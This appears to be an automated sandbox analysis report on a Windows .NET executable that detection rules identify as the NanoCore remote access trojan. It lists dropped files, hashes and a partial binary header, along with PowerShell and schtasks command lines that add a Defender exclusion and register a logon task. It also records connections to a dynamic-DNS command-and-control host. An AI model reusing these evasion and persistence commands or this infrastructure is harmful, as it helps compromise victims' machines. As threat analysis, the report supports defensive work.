                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):8
                                Entropy (8bit):3.0
                                Encrypted:false
                                SSDEEP:3:0SF:0o
                                MD5:E1A65AC335BAFC6F6B29C3045CC80746
                                SHA1:910EDE448F0375017B38504D04238B88ECE7B665
                                SHA-256:39328DADE32C9C89241351CFF0BD948E101D8AACDD5DFB46AEC0B026A80138D3
                                SHA-512:96FE761F46A325A48E2564669484741994EFFDE25F65F18F392D8BD4E18C1F6105DF7B7F846F572A524AFFEFF8EB83312B165700B67E2EEC77791F5C9E8F81F0
                                Malicious:true
                                Reputation:unknown
                                Preview:.....2.H
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):37
                                Entropy (8bit):4.17257423112624
                                Encrypted:false
                                SSDEEP:3:oNt+WfWwYHKN:oNwvwpN
                                MD5:B9253443357B989E29C7F2ABD211659E
                                SHA1:62C23472EF297E9AD5885DA092E10632FE9A1255
                                SHA-256:9A1CC820F868A1592FB51E9FCFC659212799237AC0D601CDA4D14C2A856B0F94
                                SHA-512:758C0362AD1D81B8C976079C1C1C2EFF65EA2E7966C75ACFB7ADF745F047DF07FDE309E62850E9A9F6499349D387FB48FF08FF97943B2AF8EA31AE26FC08318D
                                Malicious:false
                                Reputation:unknown
                                Preview:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):664064
                                Entropy (8bit):7.74828321522851
                                Encrypted:false
                                SSDEEP:12288:QqGhvUmBJRrmxQiRcA6qcDwnwSbKKzXHw1hwtfu4AILNTHtrlHSMOl40s0hAD0iO:pGdPBJRCGinMSmgXeQ33LL9SMOl
                                MD5:1D2CA2D522F8F4E99609CF7E88E673B4
                                SHA1:7754EADE48451776AB6109A0C584573780A4F531
                                SHA-256:26E6FE6C78632392C446E53EB0779EC99E0864D09265B9DDA557763629EF3396
                                SHA-512:427A23DFE919BC0EA067D8641829DD767DF8E68A8639E17583F3E52168E69F6CBE434B6155F807418036CEF81B62FD4F605A7EA648474B3FAA7F5C46C0E6E615
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 63%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xb..............0..............7... ...@....@.. ....................................@..................................7..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H...........t_...........p..pg..........................................2......d.m......0......nx..zm.f...m3 ....3..!..TS......7..(^.XE..d..SM..z.Rl.....\.8,....k..<...)<..:/..vA..U}..Wvf.F..Y.#.....|..H..7..-..;OM..`&..vQ..!k.Jn.l..?A..HUk#....6.J&.w....}...."h.,..A?=.k...k..ej...F.6.X2YT&.8e. W&..x.u.........|;.h......p.]..D.s$~r8).......f..U#..f)...n.-..=..3.... #:M[nK{.........8.[.c!).7Y(Y.+..B...]..o....|>..e....d..-.d..A..:.*..&..j......O.T.9.sQ..7..#{
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:unknown
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5789
                                Entropy (8bit):5.414955622850825
                                Encrypted:false
                                SSDEEP:96:BZKjSNnqDo1ZOZpjSNnqDo1ZGEi8jZ2jSNnqDo1ZWhMMGZJ:1
                                MD5:B8023493ACFC7513D0B49AC20F2AB2DC
                                SHA1:9BC3EA79060F4698CC039DCC51BBD1F27CFD337E
                                SHA-256:D7C6D92CC95D6E5BA2C61130C7ED8B40DA8015D47114BCD0FACCFFEAA6368FF2
                                SHA-512:927559E2A182AAB36373159E60E4AD97157AD28FC2A46ED8E2DCBEB73B9A35D71C80C690BC5DA6E4DA4348662C57CD7D0CBF1D884270CFB2A5BA7BEF61E36CB0
                                Malicious:false
                                Reputation:unknown
                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510202547..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\LYKZypsugb.exe..Process ID: 6456..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510202547..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\LYKZypsugb.exe..**********************..Windows PowerShell transcript start..Start time: 20220510202940..Username: computer\user..RunAs User: computer\jone
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5789
                                Entropy (8bit):5.41591529611037
                                Encrypted:false
                                SSDEEP:96:BZ2jSNXqDo1ZyZhjSNXqDo1ZCEi8jZ7jSNXqDo1ZFhMMFZ+:R
                                MD5:C4495982528CE031FA1A15D45CF20ABA
                                SHA1:932D64C3C0B2FB6D311B2574D9D1A3D6B3E3AB0B
                                SHA-256:4BAE03386C9DEE4B2DE0E955E22871D88814AEE8A94189D9C323429C397B51DC
                                SHA-512:E4AFB126DB67E8858BC346BFE550099A8AFB2B3812F8CF8E96B9B8FD907C4655ABF856B39053BB723F9B516FBFAEED8FA71415A0855A607072F3B9117C0DC93D
                                Malicious:false
                                Reputation:unknown
                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510202626..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\LYKZypsugb.exe..Process ID: 6944..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510202626..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\LYKZypsugb.exe..**********************..Windows PowerShell transcript start..Start time: 20220510203015..Username: computer\user..RunAs User: computer\jone
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5789
                                Entropy (8bit):5.417413913822655
                                Encrypted:false
                                SSDEEP:96:BZ6jSNp3qDo1ZaZJjSNp3qDo1ZzEi8jZfjSNp3qDo1ZhhMM8Z/:A
                                MD5:5B233F88C4CC3E2FDC7A7C2A28841E46
                                SHA1:EAEBE12A987BDC0EF1E17349AD12C6578E404F8E
                                SHA-256:46B9CF88587AA3AC70A8BCFE4786B2BEF96982598C4F4A0122FCBBD23E2040A2
                                SHA-512:5E10920CE9093116FE0F1BBDCE4179248D1CC234D05E769558A1A0AA056019DF5EA3F00628D9DEC649C63B446D1F52D110EDA6C68D8C0CE912AC0D3C31AABEC5
                                Malicious:false
                                Reputation:unknown
                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510202617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\LYKZypsugb.exe..Process ID: 5684..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510202617..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\LYKZypsugb.exe..**********************..Windows PowerShell transcript start..Start time: 20220510202852..Username: computer\user..RunAs User: computer\jone
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.74828321522851
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:U7Ncg7oAyC.exe
                                File size:664064
                                MD5:1d2ca2d522f8f4e99609cf7e88e673b4
                                SHA1:7754eade48451776ab6109a0c584573780a4f531
                                SHA256:26e6fe6c78632392c446e53eb0779ec99e0864d09265b9dda557763629ef3396
                                SHA512:427a23dfe919bc0ea067d8641829dd767df8e68a8639e17583f3e52168e69f6cbe434b6155f807418036cef81b62fd4f605a7ea648474b3faa7f5c46c0e6e615
                                SSDEEP:12288:QqGhvUmBJRrmxQiRcA6qcDwnwSbKKzXHw1hwtfu4AILNTHtrlHSMOl40s0hAD0iO:pGdPBJRCGinMSmgXeQ33LL9SMOl
                                TLSH:AFE49D9C765075EFC867CC76CAA82C64EA6064BB430BE207902725EDDE0D99BCF151F2
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xb..............0..............7... ...@....@.. ....................................@................................
                                Icon Hash:00828e8e8686b000
                                Entrypoint:0x4a37de
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x627883BD [Mon May 9 03:00:13 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa37840x57.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x600.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xa17e40xa1800False0.859081728909data7.75508986641IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0xa40000x6000x600False0.430989583333data4.19396571799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xa60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0xa40a00x374data
                                RT_MANIFEST0xa44140x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                DLLImport
                                mscoree.dll_CorExeMain
                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightCopyright 2014
                                Assembly Version1.0.0.0
                                InternalNameContractArgumentValidatorAttrib.exe
                                FileVersion1.0.0.0
                                CompanyName
                                LegalTrademarks
                                Comments
                                ProductNameOversikt
                                ProductVersion1.0.0.0
                                FileDescriptionOversikt
                                OriginalFilenameContractArgumentValidatorAttrib.exe
                                TimestampSource PortDest PortSource IPDest IP
                                May 10, 2022 20:26:05.844319105 CEST4976354761192.168.2.4102.89.42.162
                                May 10, 2022 20:26:08.957075119 CEST4976354761192.168.2.4102.89.42.162
                                May 10, 2022 20:26:15.051246881 CEST4976354761192.168.2.4102.89.42.162
                                May 10, 2022 20:26:31.738562107 CEST4976754761192.168.2.4102.89.42.162
                                May 10, 2022 20:26:34.914781094 CEST4976754761192.168.2.4102.89.42.162
                                May 10, 2022 20:26:40.912978888 CEST4976754761192.168.2.4102.89.42.162
                                May 10, 2022 20:26:57.675729990 CEST4977054761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:00.867829084 CEST4977054761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:06.883775949 CEST4977054761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:07.024118900 CEST5476149770102.89.42.162192.168.2.4
                                May 10, 2022 20:27:07.024276972 CEST4977054761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:09.033850908 CEST4977054761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:13.099729061 CEST4977854761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:13.117367029 CEST5476149778185.19.85.160192.168.2.4
                                May 10, 2022 20:27:13.618872881 CEST4977854761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:13.639410019 CEST5476149778185.19.85.160192.168.2.4
                                May 10, 2022 20:27:14.150048971 CEST4977854761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:14.172974110 CEST5476149778185.19.85.160192.168.2.4
                                May 10, 2022 20:27:18.277035952 CEST4977954761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:18.312689066 CEST5476149779185.19.85.160192.168.2.4
                                May 10, 2022 20:27:18.916165113 CEST4977954761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:18.950690031 CEST5476149779185.19.85.160192.168.2.4
                                May 10, 2022 20:27:19.525528908 CEST4977954761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:19.543219090 CEST5476149779185.19.85.160192.168.2.4
                                May 10, 2022 20:27:23.558701038 CEST4978154761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:23.581326008 CEST5476149781185.19.85.160192.168.2.4
                                May 10, 2022 20:27:24.197825909 CEST4978154761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:24.215622902 CEST5476149781185.19.85.160192.168.2.4
                                May 10, 2022 20:27:24.807208061 CEST4978154761192.168.2.4185.19.85.160
                                May 10, 2022 20:27:24.824640036 CEST5476149781185.19.85.160192.168.2.4
                                May 10, 2022 20:27:29.035579920 CEST4978254761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:32.042187929 CEST4978254761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:32.183749914 CEST5476149782102.89.42.162192.168.2.4
                                May 10, 2022 20:27:32.185914993 CEST4978254761192.168.2.4102.89.42.162
                                May 10, 2022 20:27:38.745908976 CEST4978254761192.168.2.4102.89.42.162
                                TimestampSource PortDest PortSource IPDest IP
                                May 10, 2022 20:26:05.667190075 CEST5607653192.168.2.48.8.8.8
                                May 10, 2022 20:26:05.832842112 CEST53560768.8.8.8192.168.2.4
                                May 10, 2022 20:26:31.565943956 CEST6064753192.168.2.48.8.8.8
                                May 10, 2022 20:26:31.736644983 CEST53606478.8.8.8192.168.2.4
                                May 10, 2022 20:26:57.445472956 CEST6490953192.168.2.48.8.8.8
                                May 10, 2022 20:26:57.582832098 CEST53649098.8.8.8192.168.2.4
                                May 10, 2022 20:27:28.897432089 CEST5650953192.168.2.48.8.8.8
                                May 10, 2022 20:27:29.034096956 CEST53565098.8.8.8192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                May 10, 2022 20:26:05.667190075 CEST192.168.2.48.8.8.80xef43Standard query (0)fastspeed.ddnsfree.comA (IP address)IN (0x0001)
                                May 10, 2022 20:26:31.565943956 CEST192.168.2.48.8.8.80xf54bStandard query (0)fastspeed.ddnsfree.comA (IP address)IN (0x0001)
                                May 10, 2022 20:26:57.445472956 CEST192.168.2.48.8.8.80x243aStandard query (0)fastspeed.ddnsfree.comA (IP address)IN (0x0001)
                                May 10, 2022 20:27:28.897432089 CEST192.168.2.48.8.8.80xb410Standard query (0)fastspeed.ddnsfree.comA (IP address)IN (0x0001)
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                May 10, 2022 20:26:05.832842112 CEST8.8.8.8192.168.2.40xef43No error (0)fastspeed.ddnsfree.com102.89.42.162A (IP address)IN (0x0001)
                                May 10, 2022 20:26:31.736644983 CEST8.8.8.8192.168.2.40xf54bNo error (0)fastspeed.ddnsfree.com102.89.42.162A (IP address)IN (0x0001)
                                May 10, 2022 20:26:57.582832098 CEST8.8.8.8192.168.2.40x243aNo error (0)fastspeed.ddnsfree.com102.89.42.162A (IP address)IN (0x0001)
                                May 10, 2022 20:27:29.034096956 CEST8.8.8.8192.168.2.40xb410No error (0)fastspeed.ddnsfree.com102.89.42.162A (IP address)IN (0x0001)

                                Click to jump to process

                                Target ID:0
                                Start time:20:25:25
                                Start date:10/05/2022
                                Path:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\U7Ncg7oAyC.exe"
                                Imagebase:0xb80000
                                File size:664064 bytes
                                MD5 hash:1D2CA2D522F8F4E99609CF7E88E673B4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.306915424.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                Reputation:low

                                Target ID:1
                                Start time:20:25:38
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
                                Imagebase:0xc00000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                Target ID:2
                                Start time:20:25:39
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:3
                                Start time:20:25:39
                                Start date:10/05/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmp43AF.tmp
                                Imagebase:0x1c0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:5
                                Start time:20:25:45
                                Start date:10/05/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff647620000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:6
                                Start time:20:25:48
                                Start date:10/05/2022
                                Path:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                Imagebase:0x520000
                                File size:664064 bytes
                                MD5 hash:1D2CA2D522F8F4E99609CF7E88E673B4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000006.00000002.520939639.0000000005160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000006.00000002.520899025.0000000005140000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
